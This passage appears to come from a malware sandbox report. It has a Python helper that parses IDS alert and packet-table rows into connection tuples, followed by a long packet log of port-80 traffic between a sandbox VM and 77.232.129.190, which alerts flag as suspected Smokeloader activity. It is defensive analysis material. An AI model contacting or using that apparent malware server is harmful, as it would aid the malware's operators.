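                d, e = de[:k], de[k:]
                if _octet_ok(d) and _octet_ok(e):
                    out.append((int(sport), int(dport), "%s.%s.%s.%s" % (a, b, c, d), "%s.%s.%s.%s" % (e, f, g, h)))
    return out


def resolve_tuple(tail: str, known_hosts=None, ephemeral=WINDOWS_EPHEMERAL):
    """The one reading consistent with the hints, or None when the row stays ambiguous."""
    lo, hi = ephemeral
    cands = candidate_tuples(tail)
    if known_hosts:
        cands = [c for c in cands if c[2] in known_hosts and c[3] in known_hosts]
    # exactly one side on an ephemeral port: the other side is the service port
    cands = [c for c in cands if (lo <= c[0] <= hi) != (lo <= c[1] <= hi)]
    return cands[0] if len(cands) == 1 else None


def parse_alert_row(line: str, known_hosts=None):
    m = ALERT_RE.match(line)
    if not m:
        return None
    # caveat: a rule message that itself ends in digits would shift the message/tail boundary
    return {"ts": m["ts"], "proto": m["proto"], "sid": int(m["sid"]), "msg": m["msg"],
            "tuple": resolve_tuple(m["tail"], known_hosts)}


def parse_packet_row(line: str, known_hosts=None):
    m = PACKET_RE.match(line)
    return None if not m else {"ts": m["ts"], "tuple": resolve_tuple(m["tail"], known_hosts)}


def summarize_flows(rows, ephemeral=WINDOWS_EPHEMERAL) -> dict:
    """Packets per direction keyed by (client_ip, client_port, server_ip, server_port)."""
    lo, hi = ephemeral
    flows = {}
    for row in rows:
        if row is None or row["tuple"] is None:
            continue
        sport, dport, sip, dip = row["tuple"]
        if lo <= sport <= hi:                          # client -> server
            key, direction = (sip, sport, dip, dport), "out"
        else:                                          # server -> client
            key, direction = (dip, dport, sip, sport), "in"
        flows.setdefault(key, Counter())[direction] += 1
    return flows


# Rows copied from the tables on this page; hosts are the sandbox VM and the alert peer.
KNOWN_HOSTS = {"192.168.2.4", "77.232.129.190"}
SAMPLE_ALERTS = [
    "05/28/24-08:25:40.383744TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.477.232.129.190",
    "05/28/24-08:23:59.175650TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973680192.168.2.477.232.129.190",
]
SAMPLE_PACKETS = [
    "May 28, 2024 08:23:59.170381069 CEST4973680192.168.2.477.232.129.190",
    "May 28, 2024 08:23:59.175395966 CEST804973677.232.129.190192.168.2.4",
    "May 28, 2024 08:23:59.175478935 CEST4973680192.168.2.477.232.129.190",
    "May 28, 2024 08:23:59.175649881 CEST4973680192.168.2.477.232.129.190",
    "May 28, 2024 08:24:00.120784044 CEST804973677.232.129.190192.168.2.4",
]

if __name__ == "__main__":
    for a in SAMPLE_ALERTS:
        print(parse_alert_row(a, KNOWN_HOSTS))
    print(summarize_flows(parse_packet_row(p, KNOWN_HOSTS) for p in SAMPLE_PACKETS))
```

Without the host hint the second alert row still has several readings (for instance 49736, 801, 92.168.2.4, 77.232.129.190 passes the port rule), so `resolve_tuple` returns None rather than guessing; feed it the host set from the report's own IP tables before trusting any tuple it returns.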
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      May 28, 2024 08:23:59.170381069 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:23:59.175395966 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:23:59.175478935 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:23:59.175649881 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:23:59.175669909 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:23:59.180653095 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:23:59.180910110 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120784044 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120834112 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120872021 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120912075 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120912075 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.120946884 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.120959044 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.120981932 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.121014118 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.121021032 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.121057987 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.121088028 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.121104002 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.121438980 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.121507883 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.126071930 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.126116037 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.126149893 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.126167059 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.177285910 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.228514910 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.228564024 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.228616953 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.243927002 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.243963003 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244016886 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.244124889 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244159937 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244195938 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244205952 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.244230032 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244277000 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.244672060 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244699955 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244745016 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.244848013 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244879007 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244911909 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.244918108 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.245358944 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245390892 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245407104 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.245426893 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245471954 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.245862961 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245894909 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245928049 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.245944023 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.246367931 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.246400118 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.246419907 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.246438980 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.246470928 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.246490002 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.246530056 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.246591091 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.247154951 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.247188091 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.247221947 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.247231007 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.252433062 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.252482891 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.351412058 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.351433039 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.351445913 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.351547003 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.363272905 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363291025 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363373995 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.363707066 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363724947 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363737106 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363746881 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363758087 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.363771915 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.363805056 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.364108086 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364130020 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364140987 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364188910 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364201069 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364259005 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.364552021 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364571095 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364595890 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.364680052 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364734888 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364763021 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.364837885 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364856958 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364867926 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.364876986 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.364902020 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.365219116 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365236044 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365246058 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365298033 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.365438938 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365477085 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.365521908 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365533113 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365580082 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.365731955 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365751028 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365761042 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.365780115 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.366175890 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366225004 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.366262913 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366275072 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366286039 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366291046 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366297960 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366328001 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.366463900 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366522074 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.366878033 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366902113 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366938114 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.366952896 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.366962910 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367002964 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.367263079 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367274046 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367284060 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367294073 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367306948 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.367328882 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.367630005 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367650032 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.367690086 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.368210077 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.368228912 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.368238926 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.368267059 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.403721094 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.403734922 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.403826952 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.403841972 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.403850079 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.403862000 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.403886080 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.403901100 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.463536024 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463582039 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463638067 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463673115 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463701010 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.463725090 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.463731050 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463781118 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.463824987 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.486845970 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.486921072 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.486975908 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487009048 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487020016 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487045050 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487052917 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487081051 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487116098 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487126112 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487149954 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487186909 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487191916 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487220049 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487257957 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487271070 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487292051 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487337112 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487382889 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487438917 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487471104 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487481117 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487596035 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487629890 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487656116 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487761974 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487792015 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487814903 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487912893 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487958908 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.487967014 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.487998962 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.488044024 CEST | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      May 28, 2024 08:24:00.488085032 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.488112926 CEST | 80 | 49736 | 77.232.129.190 | 192.168.2.4
                      May 28, 2024 08:24:00.488147020 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488154888 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488198042 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488240957 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488456964 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488492012 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488524914 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488527060 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488746881 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488794088 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488800049 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488836050 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488868952 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488878965 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488923073 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488962889 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488965988 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488992929 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489027023 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489037991 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489064932 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489099026 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489109993 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489402056 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489448071 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489454985 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489485979 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489517927 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489527941 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489656925 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489705086 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489722967 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489756107 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489799976 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489857912 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489886999 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.489929914 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.489953041 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.490005970 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.490036011 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.490051031 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.493695021 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493730068 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493765116 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493773937 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.493798971 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493812084 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.493851900 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493894100 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.493904114 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493937969 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.493979931 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.493988037 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494023085 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494056940 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494071007 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494092941 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494127035 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494139910 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494160891 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494194031 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494214058 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494229078 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494261026 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494275093 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494298935 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494328022 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494344950 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494366884 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494395971 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494410038 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494529963 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494581938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494585991 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494858980 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494910002 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.494949102 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.494982004 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495014906 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495024920 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495050907 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495086908 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495101929 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.495557070 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.495589972 CEST804973677.232.129.190192.168.2.4
